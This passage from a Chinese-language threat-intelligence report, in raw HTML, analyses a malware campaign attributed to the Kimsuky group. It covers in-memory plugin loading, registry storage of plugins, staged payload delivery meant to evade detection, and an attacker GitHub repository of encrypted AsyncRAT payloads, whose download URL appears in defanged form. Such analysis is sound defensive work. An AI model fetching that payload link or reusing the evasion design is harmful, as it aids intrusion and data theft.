&#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">clsiesockesdfwe.ReadServertData对返回内容进行处理，首先校验当前网络连接状态是否正常，确认无异常后再读取全部返回数据并暂存到缓冲区。</span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3333333333333333" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100024882" src="https://wechat2rss.xlab.app/img-proxy/?k=b9510421&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLSICGy2VYF0UUa6nkF9YSPJ68pt2pqa4HJxHvlnVgZYUicpayibMpfplfiaUm3IafrFEfRfu299KS2m0uj4XiaIkD3egArNAe5jrQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="word-break: break-all;text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span style="text-indent: 2em;text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">接着创建线程，调用</span></font></span><span style="text-indent: 2em;text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Packet.Read</span></span><span style="text-indent: 2em;text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">函数进行处理，该函数是一个插件管理器，具有执行插件</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">(</span></font></span><span style="text-indent: 2em;text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">plugin)</span></span><span style="text-indent: 2em;text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">和保存插件</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">(</span></font></span><span style="text-indent: 2em;text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">savePlugin)</span></span><span style="text-indent: 2em;text-align: justify;color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">的功能。</span></font></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.195357833655706" data-s="300,640" data-type="png" data-w="1034" type="block" data-imgfileid="100024883" src="https://wechat2rss.xlab.app/img-proxy/?k=83741653&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJspU1wPCEyQiczogkSUD4MaSUDlCibibQKqp20H64MUgQxGeyY5K1iakL3z6OKibhWXh3sic7cStntIlJhIhDXyVKkeo07z28dcvWa0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">如果执行的是</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">plugin功能，则首先判断本地是否保存有该插件，如果有该插件，便直接内存加载执行即可，如果没有该插件则</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">先向服务端请求插件信息。</span></font></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.24722222222222223" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100024884" src="https://wechat2rss.xlab.app/img-proxy/?k=309a70e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKRZnwM7X0RDUHfcaYjibMsZhiaWYf6ibF2M00pGVLOUUFQ78C7FiaMciaJ8ljpMR8A4MHM0SaJJurfsyDNAicLz87ow32gibGGmRsOgY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">save</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">P</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">lugin功能的原理是将插件的</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Hash</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">信息和二进制数据</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">(以</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Hash</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">为键名，以插件的字节数据为键值相对应</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">)</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">保存到注册表中。</span></font></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.24259259259259258" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100024885" src="https://wechat2rss.xlab.app/img-proxy/?k=d64e4d6e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLu2ibEx05ZfbUhiauice3LFiaIRzUtc7Cd04cIsicyHvR3o91Y1Wia2pGwZ0GwGUjA5fAc734AuvPPaFUHuTicH3uut4GrthibtF4ibM7c%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">攻击者前期采用分层投递的轻量化攻击战术，释放的恶意样本仅回传受害主机的基础环境与身份信息，后续可以根据回传的主机信息做定向筛选，仅针对符合预设攻击目标条件的受害主机，才会进一步下发各类专用功能插件开展深度信息搜集，这种按需加载的阶段化攻击设计，能够大幅压缩初始载荷的恶意特征面，最大程度避免攻击链路提前暴露。</span></font></p><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div style="text-align: left;margin-right: auto;margin-left: auto;"><div style="background: linear-gradient(rgba(254, 254, 254, 0) 0%, rgba(254, 254, 254, 0) 60%, rgb(255, 255, 255) 60%, rgb(255, 255, 255) 100%);"><div style="display: inline-block;"><div style="background-color: rgb(190, 25, 31);padding: 6px 15px;box-sizing: border-box;"><p data-brushtype="text" style="font-size: 18px;letter-spacing: 1.5px;color: rgb(255, 255, 255);"><strong><span style="font-size: 18px;"><span leaf="">二、攻击者仓库分析</span></span></strong></p></div></div></div></div></div><p style="text-indent: 2em;text-align: left;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">通过下载链接</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">https[:]//raw.githubusercontent.com/shantez4/EDGTy/refs/heads/main/hawek.ini，我们对攻击者github账号进行了分析，发现该账号于</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">026年1月份创建，随后在二月份创建项目仓库，并上传恶意代码。</span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5583333333333333" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100024886" src="https://wechat2rss.xlab.app/img-proxy/?k=eedbe446&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLUI8SJOyJwSZYBGd4ajyEJs056y1jImmVjO0apG7Q69zRnsdNsesqUD96A9SGV70B64VsE6rHqj4mahFiaEJA1OmDRlHLDmZB8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6398148148148148" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100024887" src="https://wechat2rss.xlab.app/img-proxy/?k=49397349&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLE143lgFib3LTYhMCGK4FD7boiaP7Mtn9oHbQOVlc2SPL8IjBdGN6WTj3x6NKfz0GibQ0DFmwUBDVuiciaIMxtggUpdzYFeEWL1SCU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">在对仓库样本进行深入分析时发现，仓库内的</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">PNG文件都是加密恶意载荷。这些文件均采用与前文一致的RC4密钥进行加密处理。对其解密后进一步分析表明，这些载荷均属于AsyncRAT家族，推测为基于AsyncRAT开源代码进行二次开发，</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">具体表现在通信协议、配置结构及功能模块上进行了定制化修改，体现出攻击者在持续迭代其工具链的过程</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">。</span></font></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">此外，在仓库中还发现攻击者的测试样本</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">，这些样本很可能用于功能测试或开发调试阶段。</span></font></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.9075425790754258" data-s="300,640" data-type="png" data-w="411" type="block" data-imgfileid="100024891" src="https://wechat2rss.xlab.app/img-proxy/?k=8686c6cb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJjkiat3DwoAgWEnO5MiaHE5naiaAsSMJ7iaMdRcydrjdiciaOQ9VyY3eutDfKFkd4AsjdUPsBkqDTfDWbhuT3FBnDFAPH6HHdrJibicDI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">最后我们还发现部分受害者信息也已上传到</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">github仓库，如下所示。</span></p><p style="text-align: center;margin-bottom: 16px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3527777777777778" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100024889" src="https://wechat2rss.xlab.app/img-proxy/?k=e9ba7c91&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIn5sYFHK2wt1mH49UvyvXccSicGTNdJKppYP8nAeI3loaiafbVzoVwvXQZ2EQD6DruEpkgiaQZTr7WqLOriaAQoEMXXlmdIXr7OIA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="105196"><div style="text-align: left;margin-right: auto;margin-left: auto;"><div style="background: linear-gradient(rgba(254, 254, 254, 0) 0%, rgba(254, 254, 254, 0) 60%, rgb(255, 255, 255) 60%, rgb(255, 255, 255) 100%);"><div style="display: inline-block;"><div style="background-color: rgb(190, 25, 31);padding: 6px 15px;box-sizing: border-box;"><p data-brushtype="text" style="font-size: 18px;letter-spacing: 1.5px;color: rgb(255, 255, 255);"><strong><span style="font-size: 18px;"><span leaf="">三、归属研判</span></span></strong></p></div></div></div></div></div><div data-role="paragraph"><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;" data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">经深度发现本次攻击方式和</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">K</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">imsuky</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">组织以往</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">T</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">TP</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">存在较大关联，具体表现如下所示：</span></font></p><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">1.自我们披露K</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei 